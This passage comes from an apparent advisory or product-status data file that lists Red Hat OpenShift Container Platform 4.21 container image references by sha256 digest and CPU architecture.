"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:eddd9cd258d32f1743547c9d8f5fe46e91365511c5c49cfefe626e8d546790cb_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:2561fb021083a53e1a38cb951c2f64dff98bb327ba85e8423668ac01f86b9422_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:762abf08666427b5aa8c7d7da94508e223a19a106e551615db8d12ecdb05a680_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:f0486f64952ca6ee97c723f62cfce9e41b1a3163afce6e856e6218db81aab416_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:fd158e43b890938b51004b960a9c753e644045880b3becb92df373fb91fe94b5_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:03906fb92943c8529cfe1e466bec8f8daf8e41981d98dd0dd8470dc2881d44fe_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:5a07998a9b00be6bb0dadefe6bd58399101ee349ac7e4438bbb52401f0e6d9ad_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:7d05b9ae8a423cce1ed3ca14e7373992d63ec40508417dc41eb3ecf3908e57ce_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:edad8eacc5e578c88d5dafef41dac47f97644c30cf15cf79a95db1e97fe90386_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:599e98f170baae773a5ce6f61ead9afd0c9bdda0e5ff6d8245b70f49bb29c050_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:855715feeb8d159042543e0fa39ae9f9ae0c93fef38369929cdf55bef7345479_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ae0697af7ccf9c43e5dc5f1f0402beedec91d935d27058b8f69be65f02a491b4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:ccac24ab41981b3f052f3cb765e5adec77ca584dbe82272243c846c7f6953064_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:119755cb13662c0badea9909769b6d1b68e39ae301528e2d02033fadafb3ada7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4ab8f0bae412a02716488ba4cdb98484f1ce8a02af2a57268325ec3fcf71a68e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:4fb910203a55e68b0808e3bc0ff4810415cdd1bc11797419fbb7fdbc207902bd_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5f60cd059fc10cc44b69ae22f112a1ee417caa80c1cc24244305b4a0d9cd3770_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:243198fd33b89359085ce6a81105a4f0994b4a4108bf14939c79925e22b21f10_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:5dc47b4cb13f136785a96251bdc04660378782ecb2402c3b97088ae1e06bcc81_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:671255acd29d7a45fbfe17fb5108065472197ba6ad1edaf57dd071bc471ab8c6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:ca2c0901f0ec1756344b5029e2912d6d7bd60c91015dbdf8b9ed704a2f59f6c0_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:83a3fd64a6dc406e9035cdd58a98f7e745919ae3b44d9fbe4bc1087f36ace997_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:87de8c9f5d7d591609208ab4332efa976b4ed303dd18f879374f2d047c9b8c9f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:bb4acaac924d3e5b90306927a9d1e848c656f2a3e3572f59c163cbdab2f96980_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:f70ed49c97be6bec1394cc8a7476bdc694d2a9222fcd63079bf6e27af8f6b465_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:00f27b950067e2221e7ec3d2b050939239d5521352a2496e152092d043588190_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:2973ce1c3d9df0e94568fdc45b90f86d6d7c65fa3bf6c319219b9e213a684101_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:3901b52ff993fc282bbea1b9b809a75da85fa70fc4d85690fed3d23922218722_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:71eedc67a3a1641b7dda0b7974b82dee449e7ee4efa5a4745042efbf32795898_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7d76c0f6f94b38c24f37c80c88f4c343792a63765d741c3c8c6c930cdb949349_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:7effee7b85d83c6fbf210c0b7dc5bc4bf9d1a218c2e0d847c7bfd4b205dd8a74_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:d3971e090065233100d9c842b116a8abed46852cf16fe23c6a02601c6898471d_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f54b6da4bb411f5fdeec587f959111281be96f9652076c9fe913dde3e0942216_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:01dcdeb5283cdeb0ddba574048f39ef56f2a2f548efffffd3984bbf29d20cd81_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:17508a3579649b2f104c177ff20decf1792214307cdfd81679075afd2287f266_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:203b0b4d925bd77ae87f65636286e232186d8d4583b4db054cfcd8a6bb5550c7_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:ac0a240e28bcd757bf17b7c394ce29039bce95933ef903512257fc77d5a563da_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:0b4342a45f1bff331108e760c7022aa89baa9f57203638560500cbb2c223e8da_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:2bd38ca9b26cfa801fa8953d3498ddeada823e50f421f9061dbbf1ba77d72d18_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:d23fea2bd893beb50feb76ea14c8674a721085694bc584f702f8ded1dc1aa7b1_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:da24b2db5c1cf99b9910abba7846c7301e1ae4fa9fa5e99e639b7840d1d53a81_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:12f808f0c0a7103699e60487369cc7e4938098c9e8844c192e957fcd564f7fd3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:8ea2c228f0d91c6e1d86cf11676e9e10d55785850aacc3d5c26c88838c6e5e6b_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c0936e2cd743f59b3b7d49c8a915503f06721578ad44f3884f547278637eb83e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c9db60882b0128f4590e519fe1743e24016c39610141e62aa0433c2ec0a007b8_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:1c12e3a479c1b9151399bd607251cd363c53d258aebbde16d9f445bf762b5c5e_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:55cb1bfa110d67c2452259e6b4a2158b8f6e7c4bba9e7dfd661e0dea37ff2e25_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:99fc6f28b728c227ac8fb8b0dce24369168c7c1aa470778953b30e7fb0ecd1dc_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e77e4ba2ca054937f43d56ea54ed53df29fb55179879064a83ab078660c6c9f7_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:9c77d337f175a9ae409943abbbe952a6c738f6ea7f35f0108b338501f7454bb4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:aca9a52fb5a895ab113232b967887b942882b83e0e8902c269214df95173a386_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:f74d2a1cde5b1ad9da59a8ecd9b81f86aae535ec800c116bb3d160fb81961ba4_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-console-rhel9@sha256:fdcf40f0405b01b5e02f2ec83b5bdbeb374294f0041a97007d430c3c4109573c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:64d0b8bb7edbe154290b673c995576311b6d0afa28c43503788796c5f7e6451e_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:aad763544d16ba5a83b072093e775808c09f75f75a9a090c6d92a6a7b825ee69_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:bc41319e164e78b324afc58f901a74ac57dbda40bcec111adbfd3341f23d99ac_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:c6239025da97af64f8edc0451e856f716b30b6524f2b85b58fc2495d3d324ca3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:26d93d9c3f7d1062352b9a3c8fc310493b82a992fbaee507f2acd89a25af9817_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:37108a8ac0e5f8284600cfaf82464ca52003565a2a2f2c88063b88ca5bf51d96_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:b407d2fd2856dcec89ab84290158a5bd6c137930fc6f50ede20955d7b01c3aa2_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:c8fe680b1a191adfcce2a63df567dbe0c9a8eb29e627d58a396dba2087b8e25d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:5e34c5fe7eb76d49ef6a3d0f51d992027a1eb03d2bb19849101e06f1c5712c0c_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:caaa046579e45eb9fd04e0ccaf4626dc996821dd2c285c98f817aafd4ff5699a_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:bb5390b5c793399187217ba40659b86e9de4a301fe555c630a41a198d0e36bdb_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:f7826f13f5ddd0da5388b0122164cc20f00f18d5c6e7ded86c600d09e75f23e4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:bf37d0ca7770e6609c5c746e13d5a44c38162f6d5e9892de2aeee29cf152236b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:f3efff725f2e8a8a771f0fd6632819d69335da62c57a6da55b2aba08ec3d08a5_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:052ee53314fff6d49caa1b52be80c90f4a81bdfd9b0f27ed6c2a5cf4e260ef33_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1dfaae34d94c83c0980ad92ab74ee4e60b727a7bdb6e671dc5a99b907bb33ddd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:38e460f96e25cf1d13a7092fa9b9aa5f0b61b30217f5ffcabdec78e1fb8215f3_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:be1d0b6e6b3d11f0028bd8e17f6fa5f948472ae1664a08ddb27c325137e4c013_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:1b31ce33a1c3710bfc248e76293ed88a8eb9a250b5bd8ec39706bd54d19e3eba_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:34f242c441b8c550a655ac872ae8c9b97ad417e82b7c46b865f93c5b5ec75a42_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:41e352ba9ad323ac14abd8e9f49a942cedb89b0f16b0e21e4773070c46cf01ba_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9bb667960a8f888be2bcee6a24688bb30200990775dce499ad94b0137174609f_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:7980c446d0b882444418d1c3dd89be448124b9d58d94a19951c534193e26a242_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:a0e267de6bed29219c427f960712fef9345af738251bcf9d471895d019ec894d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:db5a00fe20fb9b52f0a5e01bd5462d1db5725c4b91354ee38d70fc32f6330191_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:f11375cabff0a8433c9a1af3d097482d48f29a060609a30391fcf1bbd24bf0ce_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:6fa875bee4fc70d30398f87be115e6e3c9574e5cdd469371589d55eff70ab5cf_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:df3604d1255d191a0108b37c87dfb3674e27f1adbc6a1e73df74182b2252f900_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:e1d620dd772b606f22d2d87212bb177c49ff06534e7f6c3c23b63989f7f3d9da_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshot-metadata-rhel9@sha256:f645058a52bda117e49b0dcaddeb6a94d09dc50410cbd1ad976be96d1e1af407_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:153a55ce471731257054208373296f8f46f011cf5919a9619803abcd790c1ade_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:ae8f624c43ae3af3011158c8f646d1055d5042f2b9e0314611c84a6a1eed1bac_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:c250ea4c101b9b0193fcdeffece7e816dd2db1e670af97176e38b2785fa68900_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:dc09c24ed64144c3786b201426b0d796896d5d4ab5c512be8b384863d6f02884_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:595b03c50302148c33de51825571a2b59a1930591d461a717315be05c6efdbb1_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:6dc06ddd4760393cb6737b9c259e41a33065392db9aa772d86da211e17949e16_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:8c949eabc7146e5cf5d7dbe0faa19717bbc6798e8bddc4b387fa8f498697cfa8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:e09166e12e41529af8b4097fd30b3b874d7415e0001f3bad5051a6e2c4962cff_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:60c0c64458e0e76742fc7b6a89a556ae479c0db8696a9ea4e26fcd761c8bcf70_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:6bb20817f634256d50553f735342581d901334968247da8a6a53173d1205f220_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:bbb9cea4afaf999cb15d7c55d31f9825167ba7a9cf7fc9e43e418c7bc5463502_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:c90d130c0e235ccb6395abdf3a0ce0e21fc14de92425b7fd5b517d3d0f9ad1fa_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:7d1370d3d3a2f2f50cffd40783e46a0c830cb7326231de0c620d71c832422fc4_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:ad3637958bf538933748f6a7bf3512bf18d01a4082e308dfd7a451639601b320_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:e13bbf95fdfd5a8f1ae64cb7f0c06ea5773d7f133584c4488d4d4b2411b36bbd_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:f27fe2d2c41b23c7fc8dc7dd2c442b792583c424c60f72e425dd91a1358c7fd8_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:04a546e0d3565c8b6fe8975074b5a4ddf8bb9d2cb76fdc5083d6313e96c4c084_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:1bdf652d7b821aaf84e717f811073cfc347ad45e86b5d6a01f89f68eefe2eb3e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:bfaf7ccaf20cb2c1f4808d0729ee29dd040d1a6affc10c54512637f3f348eff9_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:c6ffe0b9527d2431a8cb3aa16e0f353e5f715278ed48282ac33be339a704bdda_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:5199b636240c6bce865db65c585dad4557b45f20dd78c275df7536c17ee5f8c7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:7b8d5213a8ee963f2edde31d4865d0450267d35505467c217a490efc1afe8289_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:e683a2939c279d6b694eca7d8591e66459b880eefe3d5ba3312e2ed90e8337e5_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:ee26deea807e27278f4286dcc3d62a2ac54dcd75e52b20150c943d5556367222_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:4bf941cfba094da6cc387b0b24430b60131c812dfb179e8ca0f57e15b4757434_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:7958abc201949f9faed6fe6cd4f8e2f8dab06dde35f09779cec19e9286f3983d_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:b813e2c74a2180534b64eba9e4847ce7799f2c6b36cc91d429d0f3ea7e8d8e6d_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:e38a0d0e75270f3acdb47ba5e7f0359ec7de6bfa1cadcc082ab9393cad673990_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:1a4181f0d2ba03e2168f4bf87be3290711b65e96da3998b1315e6d29ed56bb5e_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:c17093b12e451052d0b50b93e4f165608cc0f32fa2813c703756c66805e5912b_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d618e7ff80f4919d20ed8639c9a61e3db83c500628b22cb92bafc08597c44953_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:f50ed232b96a6a5809867d68ccfd688a03d506c88aab1607bc115553c8ebf3a9_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:4bb9e672922e50ec937868aad492e319d40d7c24a247650f2d39fe2ab5f4c6db_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:605aba5c7d9d19b5505ccef7f194c4842c3fb95de679d1b6644695efff259356_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ec7a31da8937a874a6e5bb866f53f21eae3b174663e2f4e7c6bfceadb6ef9415_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:9f76b703dd3bda6e39fee67990cbf7f18ca3856b51610ecd8e3355e435af9863_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:acd9330cdd75e08c16c5f0e819d4200d353af95fe5943d25b7f4eec4c6f4595f_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fde514cea5c59ece8928a6f9248fd58858ee0b3ae6df84281f0a2f00ad2e507f_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:062c301cf5f354992055176ee1ba2cfd03748cb1045c1a1819e34ff71c0775b3_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:a023bca30051596776daab0263ddb617d2a13dabc46de5c97f123b253fbf3d29_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e940d0365a64e273be01d35537c61be14f5ec1c3e8971ee8a41382861cf35efe_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:0ffaa1a15a78babd7663e94f876629d768f7e7835c3778d96b146b7fb758d0b1_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:71be38fcf1f7e316ccc94937d0ebe9799762a8cbc14cadd426342c4cbc47f259_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:82c80097ae5a60ac10a19d486cba96bc72e5b799350e925a459ae0bb37cc22b3_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:7fd964ab54bcdea280ba34f98d6d9f7365c4bbda46136e63ee80a19f231e36be_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:854ddefe9f6d6c6a9afa3df8188f96fa05364a28ec6432ad248bcd2e457182a1_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:f882bedd7b4e73d9e850a3ffeec653718848cb596ce8bfbbb34a0a7f4a36a680_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:fca3cb9d3e9541e01418795e31ebc918fef89031828d64846c81ab59eb3fb4d2_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:015d764fd216b07543e8c2d0f25aa29f9695e8501c178f0ee3b6759bde5631ce_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:827cfae8caf3dbc109b7a17cad74a55d9a4b2b037be5da6174a4e0fba36de5d0_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:afb37a117f3ef2967b8ade392055bd3aadce2a2c19f21eb3b36e39224dc046c7_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:e8badf78c7d338c04dc43be33d6de5484c70d2d60388d26b77bbed2ffa2f7071_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:130477ef0652a23921c63297c08c35a8e89a06e02d7be26a6e6cc5e0855a3693_amd64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:18cd11b57cbd5d2a7a277bc8abe8ff6f5f2b663072f9d44994e4093fc986ea39_arm64",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b150b48e8f6a937e9d025c72761ac9d2ca82d59d69ce28a36a1108f09250c53b_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:c9b03caecf5048cc37952df8194ddb113de62bdb7ebbb8a927a3299e1e3975b6_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:3990f7f0d2e505ec391fe3056a175d985b5f508642740bcbf8b61fabf6ecda75_s390x",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:4cd532032ab58f5d6029ec366d79f46c909db4374fbc26212558e689f7059f07_ppc64le",
"Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:8c9c050549f490f6b96eca68bb61a32f164b2152cae31b4ffb7d7ecc4bd678b1_amd64",
